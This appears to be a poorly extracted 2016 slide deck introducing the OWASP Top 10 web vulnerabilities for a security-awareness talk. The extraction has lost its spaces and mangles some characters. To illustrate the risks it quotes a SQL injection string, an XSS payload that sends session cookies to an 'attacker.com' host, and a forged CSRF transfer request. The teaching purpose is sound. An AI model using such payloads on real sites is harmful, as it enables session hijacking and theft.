Embed Size (px)
Citation preview
Top 10 Web Application Vulnerabilities
Why you should care about them…plus a
live hacking demo! !
Why should you care?!
Insecureso*wareisunderminingourfinancial,healthcare,defense,energy,and
othercri8calinfrastructure.
(Source:OWASPTop102013,p.2)
Percentage(bluebar),andcountofbreachesperpaIern.Thegraylinerepresentsthepercentageofbreachesfromthe2015DBIR.(n=2,260).(Source:VerizonDBIR2016)
classSuccessfulBreaches(charsource=“Webapplica8onaIacks”;publicclassSectorsArray{privateString[]sectors={“FinancialServices”,“Informa8on”,“Entertainment”};
}publicclassSectorsArray{privateInt[]percents={82,57,50};
}publicJavaStringArrayTests1(){intsize=Sectors.length;for(inti=0;i<size;i++){System.out.println(source,“accountfor”,percents,“ofconfirmedbreachesinthe”,sectors,“sector”[i]);}}
Web application attacks account for!82%ofconfirmedbreachesintheFinancialServicessector57%ofconfirmedbreachesintheInforma8onsector50%ofconfirmedbreachesintheEntertainmentsector(Source:VerizonDBIR2016)
In2015,therewerealmost20,000incidentsofwebsitesthatwerecompromisedandusedtoeitherhostmalware,par8cipateindistributeddenial-of-service(DDoS)aIacksorrepurposedasaphishingsite.(Source:VerizonDBIR2016)
Open-sourceandthird-partycomponentsintroduceanaverage24vulnerabili8esintoenterprisewebapplica8ons,codeanalysiscompanyVeracodehasfound.(Source:ComputerWeekly,A.Wickford,Oct2014)
Cyberthreatactorscon8nuetoexploitunpatchedso*waretoconductaIacksagainstcri8calinfrastructureorganiza8ons.Asmanyas85percentoftargetedaIacksarepreventable.(Source:US-Cert,TA15-119A)
Atopthisyear's[CWE]*listareSQLinjec8onflaws,whicharethemostseriousduetotheircommonnatureandtheeaseandfrequencyofexploitonline.Othertopvulnerabili8esincludeopera8ngsystemcommandinjec8on,classicbufferoverflow,andcross-sitescrip8ng.(Source:DarkReading,“FedsIden8fyTop25So*wareVulnerabili8es”)*CommonWeaknessEnumera8on
So we all agree !this is a problem, right?!
Good news, ! there is a solution!!
What is OWASP?!
• OpenWebApplica8onSecurityProject• Worldwide,not-for-profit501(c)(3)
www.owasp.org“Ourmissionistomakeso*waresecurity
visible,sothatindividualsandorganiza8onsareabletomakeinformeddecisions.“
OWASP Top 10 Project!
• Alistofthe10mostcri8calwebapplica8onsecurityrisks
• Version1releasedin2003• Currentversionpublishedin2013– Priorversions2010,2007,and2004
hIp://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf
OWASP Top 10 Project!
• OWAPTop10isanawarenessdocument– NOTastandard– Butitiscitedbymanyotherorganiza8ons
– Focusonrisks,notjustvulnerabili8es
OWASP Top 10 for 2013!
A1–Injec8onA2–BrokenAuthen8ca8onandSessionManagementA3–Cross-SiteScrip8ng(XSS)A4–InsecureDirectObjectReferencesA5–SecurityMisconfigura8onA6–Sensi8veDataExposureA7–MissingFunc8onLevelAccessControlA8–Cross-SiteRequestForgery(CSRF)A9–UsingKnownVulnerableComponentsA10–UnvalidatedRedirectsandForwards
I’mnotacomputergeek,whatdoesallthismean?
A1 - Injection!
Injec8onflaws,suchasSQL,OS,andLDAPinjec8onoccurwhenuntrusteddataissenttoaninterpreteraspartofacommandorquery.TheaIacker’shos8ledatacantricktheinterpreterintoexecu.ngunintendedcommandsoraccessingdatawithoutproperauthoriza.on.
Example Attack!
Theapplica8onusesuntrusteddataintheconstruc8onofthefollowingvulnerableSQLcall:
Stringquery="SELECT*FROMaccountsWHEREcustID='"+request.getParameter("id")+"'";
WhatiftheaIackermodifiesthe‘id’parametervalueinhisbrowsertosend:'or1=1’.Forexample:
Stringquery="SELECT*FROMaccountsWHEREcustID='"+request.getParameter(”’or1=1’")+"'";
Thischangesthemeaningofthequerytoreturnalltherecordsfromtheaccountstable.MoredangerousaIackscouldmodifydataoreveninvokestoredprocedures.
Why does it work?!
Because1alwaysequals1!
Specialcharacters,like;=‘arenotremoved(escaped)fromthequery.
A2 – Broken Auth & Session Mgmt!
Applica8onfunc8onsrelatedtoauthen8ca8onandsessionmanagementareo*ennotimplementedcorrectly,allowingaIackerstocompromisepasswords,keys,orsessiontokens,ortoexploitotherimplementa8onflawstoassumeotherusers’iden88es.
Example Attacks!
Scenario#1:Airlinereserva8onsapplica8onsupportsURLrewri8ng,pu}ngsessionIDsintheURL:
hIp://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii
Anauthen8cateduserofthesitewantstolethisfriendsknowaboutthesale.Hee-mailstheabovelinkwithoutknowingheisalsogivingawayhissessionID.Whenhisfriendsusethelinktheywillusehissessionandstoredcreditcardinforma8on.(Freevaca8ontoHawaii)
Example Attacks!
Scenario#2:Applica8on’s8meoutsaren’tsetproperly.Userusesapubliccomputertoaccesssite.Insteadofselec8ng“logout”theusersimplyclosesthebrowsertabandwalksaway.AIackerusesthesamebrowseranhourlater,andthatbrowseriss8llauthen8cated.
A3 – Cross-Site Scripting (XSS)!
XSSflawsoccurwheneveranapplica8ontakesuntrusteddataandsendsittoawebbrowserwithoutpropervalida8onorescaping.XSSallowsaIackerstoexecutescriptsinthevic8m’sbrowserwhichcanhijackusersessions,defacewebsites,orredirecttheusertomalicioussites.
Example Attack!
Theapplica8onusesuntrusteddataintheconstruc8onofthefollowingHTMLsnippetwithoutvalida8onorescaping:
(String)page+="<inputname='creditcard'type='TEXT‘value='"+request.getParameter("CC")+"'>";
TheaIackermodifiesthe‘CC’parameterinhisbrowserto:
'><script>document.loca8on='hIp://www.aIacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
Thiscausesthevic8m’ssessionIDtobesenttotheaIacker’swebsite,allowingtheaIackertohijacktheuser’scurrentsession.
Why does it work?!
Thebrowserwillautoma8callyloadthesitecontainedinthe<script>tags,andthewebsite
allowsittorun!
A8 – Cross-Site Request Forgery (CSRF)!
ACSRFaIackforcesalogged-onvic8m’sbrowsertosendaforgedHTTPrequest,includingthevic8m’ssessioncookieandanyotherautoma8callyincludedauthen8ca8oninforma8on,toavulnerablewebapplica8on.ThisallowstheaIackertoforcethevic8m’sbrowsertogeneraterequeststhevulnerableapplica8onthinksarelegi8materequestsfromthevic8m.
Example Attack!
Theapplica8onallowsausertosubmitastatechangingrequestthatdoesnotincludeanythingsecret.Forexample:
hIp://example.com/app/transferFunds?amount=1500&des8na8onAccount=4673243243
AIackerconstructsarequestthatwilltransfermoneyfromthevic8m’saccounttotheaIacker’saccount,andthenembedsthisaIackinanimagerequestoriframestoredonvarioussitesundertheaIacker’scontrol:
<imgsrc="hIp://example.com/app/transferFunds?amount=1500&des8na8onAccount=a8ackersAcct#“width="0"height="0"/>
Ifthevic8mvisitsanyoftheaIacker’ssiteswhileheisalreadyauthen8catedtoexample.com,theseforgedrequestswillautoma8callyincludetheuser’ssessioninfo,authorizingtheaIacker’srequest.
Why does it work?!
Simpleparametermanipula8on;andthetargetsitedoesn’tvalidateeachrequestwithan
unpredictabletoken.
1 HackingDemo 45
StuartSmith
ISACAGeekWeek
August2016
Live Hacking Demo!
Evolution of the Top 10!
Ranking 2007 2010 2013
1 CrossSiteScrip8ng(XSS) Injec8on Injec8on
2 Injec8onFlaws CrossSiteScrip8ng(XSS) BrokenAuthen8ca8onandSessionManagement
3 MaliciousFileExecu8on BrokenAuthen8ca8onandSessionManagement Cross-SiteScrip8ng(XSS)
4 InsecureDirectObjectReference InsecureDirectObjectReferences InsecureDirectObjectReferences
5 CrossSiteRequestForgery(CSRF) CrossSiteRequestForgery(CSRF) SecurityMisconfigura8on
6 Informa8onLeakageandImproperErrorHandling SecurityMisconfigura8on Sensi8veDataExposure
7 BrokenAuthen8ca8onandSessionManagement InsecureCryptographicStorage MissingFunc8onLevelAccessControl
8 InsecureCryptographicStorage FailuretoRestrictURLAccess Cross-SiteRequestForgery(CSRF)
9 InsecureCommunica8ons InsufficientTransportLayerProtec8on UsingKnownVulnerableComponents
10 FailuretoRestrictURLAccess UnvalidatedRedirectsandForwards UnvalidatedRedirectsandForwards
Action Steps!
1. Webapplica8onvulnerabilityscanners– Commercialtools– Opensourcetools
2. SecureCodingAwarenessfordevelopers– OWASPhasgreatresources
3. Sta8cCodeAnalysistools(See#1above)
Final Thoughts!
• OWASPTop10isnottheend-all• Defenseindepth!
• MobileisagrowingthreatOWASAPTop10Mobile:hIps://www.owasp.org/index.php/Mobile#tab=Top_10_Mobile_Risks
QUESTIONS?!
